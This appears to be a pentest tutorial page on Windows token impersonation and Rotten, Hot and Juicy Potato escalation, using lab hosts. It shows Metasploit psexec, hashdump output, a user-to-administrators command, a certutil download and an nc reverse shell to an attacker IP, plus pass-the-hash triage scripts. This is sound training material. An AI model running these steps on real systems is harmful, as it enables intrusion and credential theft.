# Token Impersonation - Potato attacks

## What is it

* A token is the object Windows attaches to every process and thread to describe its security context: the user, its groups and its privileges. Once we run as SYSTEM on a box we can borrow the token of another logged-on user and act as that user without knowing their password or hash.

## How to

* Launch Metasploit: `msfconsole`
* Choose the exploit: `use exploit/windows/smb/psexec` (it writes a service binary over `ADMIN$`, so the credentials must belong to a local administrator of the target; `fcastle` is one here)
* Set: rhosts, smbdomain, smbpass, smbuser, target (`show targets` lists the choices), payload
* Launch the attack: `run`
* We get a Meterpreter session running as SYSTEM, since the payload was started as a service:

  ```
  msf6 exploit(windows/smb/psexec) > run

  [*] Started reverse TCP handler on 10.0.2.8:4444 
  [*] 10.0.2.15:445 - Connecting to the server...
  [*] 10.0.2.15:445 - Authenticating to 10.0.2.15:445|marvel.local as user 'fcastle'...
  [!] 10.0.2.15:445 - peer_native_os is only available with SMB1 (current version: SMB3)
  [*] 10.0.2.15:445 - Uploading payload... oeyrkyrs.exe
  [*] 10.0.2.15:445 - Created \oeyrkyrs.exe...
  [*] Sending stage (200262 bytes) to 10.0.2.15
  [+] 10.0.2.15:445 - Service started successfully...
  [*] 10.0.2.15:445 - Deleting \oeyrkyrs.exe...
  [*] Meterpreter session 1 opened (10.0.2.8:4444 -> 10.0.2.15:61871 ) at 2022-02-11 13:49:12 -0500

  meterpreter > 
  ```
* Getting hashes: `hashdump`

  ```
  meterpreter > hashdump
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::
  ```
* Meterpreter extensions are loaded with `load`; type `load` and press tab twice to list the available ones
* `load incognito` gives us the token commands:

  ```
  Incognito Commands
  ==================

      Command              Description
      -------              -----------
      add_group_user       Attempt to add a user to a global group with all tokens
      add_localgroup_user  Attempt to add a user to a local group with all tokens
      add_user             Attempt to add a user with all tokens
      impersonate_token    Impersonate specified token
      list_tokens          List tokens available under current user context
      snarf_hashes         Snarf challenge/response hashes for every token
  ```
* `list_tokens -u` lists the tokens by user. Delegation tokens come from interactive and service logons and can be used to authenticate to other hosts; impersonation tokens come from network logons and only work on this box:

  ```
  meterpreter > list_tokens -u

  Delegation Tokens Available
  ========================================
  Font Driver Host\UMFD-0
  Font Driver Host\UMFD-1
  Font Driver Host\UMFD-2
  MARVEL\Administrator
  MARVEL\fcastle
  NT AUTHORITY\LOCAL SERVICE
  NT AUTHORITY\NETWORK SERVICE
  NT AUTHORITY\SYSTEM
  Window Manager\DWM-1
  Window Manager\DWM-2

  Impersonation Tokens Available
  ========================================
  No tokens available
  ```
* Impersonate Administrator (the backslash is doubled because the Meterpreter console treats a single `\` as an escape):

  ```
  meterpreter > impersonate_token marvel\\administrator
  [+] Delegation token available
  [+] Successfully impersonated user MARVEL\Administrator
  meterpreter > shell
  Process 8576 created.
  Channel 1 created.
  Microsoft Windows [Version 10.0.19044.1288]
  (c) Microsoft Corporation. All rights reserved.
  C:\Windows\system32>whoami
  whoami
  marvel\administrator
  ```
* `hashdump` reads the SAM with SYSTEM rights, so it fails while we impersonate `MARVEL\Administrator`; `rev2self` drops the impersonated token and returns us to the SYSTEM context the psexec service gave us
* A delegation token stays on the target as long as that user's logon session is alive (an interactive session that was never logged off, a running service); a reboot clears them all
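Reading a `hashdump` is easier when the two well-known "empty" hashes are recognised automatically. The script below is an added example (not part of the original page or of Metasploit) that parses the `user:RID:LM:NT:::` lines printed above, flags blank-password and built-in accounts, and keeps only the entries pass-the-hash can actually use. The sample input is the dump from this page, embedded as a constructed string.

```python
"""Triage a meterpreter hashdump: which accounts are worth pass-the-hash?

Added example (not part of the original page or of Metasploit): parses the
user:RID:LM:NT::: lines that hashdump prints and flags the well-known
empty-password hashes, so a SAM dump can be read at a glance.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Hash of an absent LM password and NT hash of a blank password. Every modern
# Windows box stores the first one; the second means the password is empty.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

HASHDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample: the hashdump output shown earlier on this page.
SAMPLE_HASHDUMP = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::
"""


@dataclass(frozen=True)
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def blank_password(self) -> bool:
        """Empty NT hash: blank password. On Windows 10 the built-in
        Administrator is disabled by default, so for RID 500 this usually
        means 'disabled', not 'log in with no password'."""
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        """A real LM hash means LM hashing was left on: trivially crackable."""
        return self.lm != EMPTY_LM

    @property
    def builtin(self) -> bool:
        """RIDs below 1000 are well-known accounts (500 Administrator, 501 Guest,
        503 DefaultAccount, 504 WDAGUtilityAccount); 1000+ were created later."""
        return self.rid < 1000

    def pth_secret(self) -> str:
        """LM:NT string in the form impacket's -hashes option accepts."""
        return f"{self.lm}:{self.nt}"


def parse_hashdump(text: str) -> list[SamEntry]:
    """Keep only lines in hashdump format; prompts and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = HASHDUMP_LINE.match(line.strip())
        if m:
            entries.append(SamEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def pth_candidates(entries: list[SamEntry]) -> list[SamEntry]:
    """Accounts with a non-blank NT hash: the ones pass-the-hash can actually use."""
    return [e for e in entries if not e.blank_password]


if __name__ == "__main__":
    for e in parse_hashdump(SAMPLE_HASHDUMP):
        flags = []
        if e.blank_password:
            flags.append("blank/disabled")
        if e.lm_stored:
            flags.append("LM hash stored")
        if e.builtin:
            flags.append("built-in")
        print(f"{e.user:20} RID {e.rid:5} {e.pth_secret()}  {', '.join(flags)}")
```

On this dump only `Frank Castle` and `WDAGUtilityAccount` carry a real NT hash; the latter is a disabled built-in account (Windows Defender Application Guard), so `fcastle` is the one hash worth replaying or cracking.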

## Potato Attacks

* The Rotten/Juicy Potato family tricks a SYSTEM-owned COM/DCOM service into authenticating to us and then impersonates that authentication, so the account we already run as must hold `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege`. Service accounts usually do (IIS application pools, MSSQL, `NETWORK SERVICE`, `LOCAL SERVICE`); a regular user does not. Check with `whoami /priv`. Hot Potato is the exception: it relies on NBNS spoofing and an NTLM relay to the local SMB service rather than on either privilege.

### Hot potato

* Hot Potato is the original 2016 technique: it spoofs NBNS answers for WPAD, stands up a local proxy and relays the NTLM authentication of a Windows component (such as Windows Update) to the local SMB service to run a command as SYSTEM. It only works on hosts missing MS16-075 and can take several minutes to trigger.
* We can use [Tater](https://github.com/Kevin-Robertson/Tater), a PowerShell implementation
* `powershell.exe -nop -ep bypass`
* `Import-Module .\Tater.ps1`
* `Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"` (replace `user` with the account we currently run as; `-Trigger` selects how Tater provokes the authentication that gets relayed, see its README for the options)
* Once it fires, our user should be in the administrators group; check with `net localgroup administrators`
* See [here](/pentips/writeups/htbwriteups/htb-jeeves.md) an example of a potato attack

### Juicy potato

#### Enumeration after initial shell with MSSQL

* Say we have a shell on an mssql instance `mssqlclient.py sql_dev@IP-ADD -windows-auth`
* We can enable command shell using `enable_xp_cmdshell`
* And then we will be able to type every command we need this way: `xp_cmdshell whoami /priv`
* For juicy potato we need to check if we have `SeImpersonatePrivilege` enabled\
  ![image](https://user-images.githubusercontent.com/96747355/163688651-8f07b5f6-4b0d-4ece-bb80-8249770d3b29.png)
* We do!

#### Exploitation

* Get the JuicyPotato binary on our attacking machine: `wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe`
* Serve it with a Python HTTP server: `python3 -m http.server 80`
* Pull it onto the target with certutil (the destination folder must exist and be writable by the MSSQL service account): `xp_cmdshell certutil.exe -urlcache -f http://10.10.14.117/JuicyPotato.exe C:\Tools\JuicyPotato.exe`
* Start a listener on the attacking machine (`nc -lvnp 8443`) and launch the escalation: `xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.117 8443 -e cmd.exe" -t *`
  * `-l` is the local port the rogue COM server listens on (any free port), `-p` the program to launch, `-a` its arguments (here a reverse shell through an `nc.exe` we dropped in `c:\tools` beforehand) and `-t` the CreateProcess call to use: `t` for CreateProcessWithTokenW (needs SeImpersonatePrivilege), `u` for CreateProcessAsUser (needs SeAssignPrimaryTokenPrivilege), `*` tries both
  * If the default CLSID does not work on the target, pass another one with `-c {CLSID}` from the per-version list in the Juicy Potato repository
  * Juicy Potato does not work on Windows 10 1809 / Windows Server 2019 and later; there, use PrintSpoofer, RoguePotato or JuicyPotatoNG, which have the same privilege prerequisite
* And we should get an `NT AUTHORITY\SYSTEM` shell on our listener\
  ![image](https://user-images.githubusercontent.com/96747355/163689119-b9682c58-c8cc-421b-9d62-1e2d7451f525.png)
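The prerequisite check at the top of this section and the `whoami /priv` enumeration step above come down to two questions: does the current account hold one of the two token privileges, and is the target build one where Juicy Potato still works. The script below is an added example (not part of the original page or of any potato tool) that answers both from the raw `whoami /priv` table and the `ver` banner, and picks the matching `-t` flag. The `whoami /priv` sample is constructed to look like a typical MSSQL service account.

```python
"""Decide which potato applies from `whoami /priv` and the Windows build.

Added example (not part of the original page or of any potato tool): the
attacker-side check behind the enumeration step. It parses the `whoami /priv`
table that comes back through xp_cmdshell, finds the two privileges the
Rotten/Juicy Potato family needs, picks the matching JuicyPotato `-t` flag and
refuses JuicyPotato on builds where it no longer works.
"""
from __future__ import annotations

import re

# The two privileges the Rotten/Juicy Potato family needs the current account to hold.
IMPERSONATE = "SeImpersonatePrivilege"            # CreateProcessWithTokenW  (-t t)
ASSIGN_PRIMARY = "SeAssignPrimaryTokenPrivilege"  # CreateProcessAsUser      (-t u)

# Windows 10 1809 and Windows Server 2019 are build 17763: from there on the
# DCOM change breaks JuicyPotato; PrintSpoofer/RoguePotato/JuicyPotatoNG are needed.
JUICY_LAST_BUILD = 17762

# Name, description and State columns; the state is always the last word.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")
VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)")

# Constructed sample: what `xp_cmdshell whoami /priv` typically returns for an MSSQL service account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_whoami_priv(text: str) -> dict[str, str]:
    """Map privilege name -> 'Enabled'/'Disabled'; header and separator lines are skipped."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def held_token_privs(privs: dict[str, str]) -> list[str]:
    """Privileges usable for a potato. 'Disabled' still counts: the privilege is in
    the token and a process can turn it on with AdjustTokenPrivileges; what matters
    is that whoami lists it at all."""
    return sorted(p for p in (IMPERSONATE, ASSIGN_PRIMARY) if p in privs)


def juicy_t_flag(held: list[str]) -> str | None:
    """JuicyPotato -t value matching the privileges we hold (None: potato not possible)."""
    if IMPERSONATE in held and ASSIGN_PRIMARY in held:
        return "*"
    if IMPERSONATE in held:
        return "t"
    if ASSIGN_PRIMARY in held:
        return "u"
    return None


def windows_build(banner: str) -> int:
    """Build number from `ver` / the cmd.exe banner: 'Microsoft Windows [Version 10.0.19044.1288]' -> 19044."""
    m = VERSION.search(banner)
    if not m:
        raise ValueError(f"no version in {banner!r}")
    return int(m.group(3))


def choose_potato(privs: dict[str, str], build: int) -> str:
    """Human-readable verdict for the enumeration step."""
    flag = juicy_t_flag(held_token_privs(privs))
    if flag is None:
        return "none: the account holds neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege"
    if build <= JUICY_LAST_BUILD:
        return f"JuicyPotato -t {flag}"
    return f"build {build} >= 17763: JuicyPotato is blocked, use PrintSpoofer, RoguePotato or JuicyPotatoNG"


if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for banner in ("Microsoft Windows [Version 10.0.14393]", "Microsoft Windows [Version 10.0.19044.1288]"):
        print(banner, "->", choose_potato(privs, windows_build(banner)))
```

Run it against the real `whoami /priv` and `ver` output pasted from the target: build 14393 (Server 2016) yields `JuicyPotato -t *` for the sample account, while the 19044 banner seen earlier on this page is refused and points to the newer tools.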

## Resources

{% embed url="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/" %}
Rotten Potato - Foxglove Security
{% endembed %}

{% embed url="https://github.com/ohpe/juicy-potato" %}
Juicy Potato
{% endembed %}

{% embed url="https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners" %}
TCM Security - Windows privilege escalation
{% endembed %}

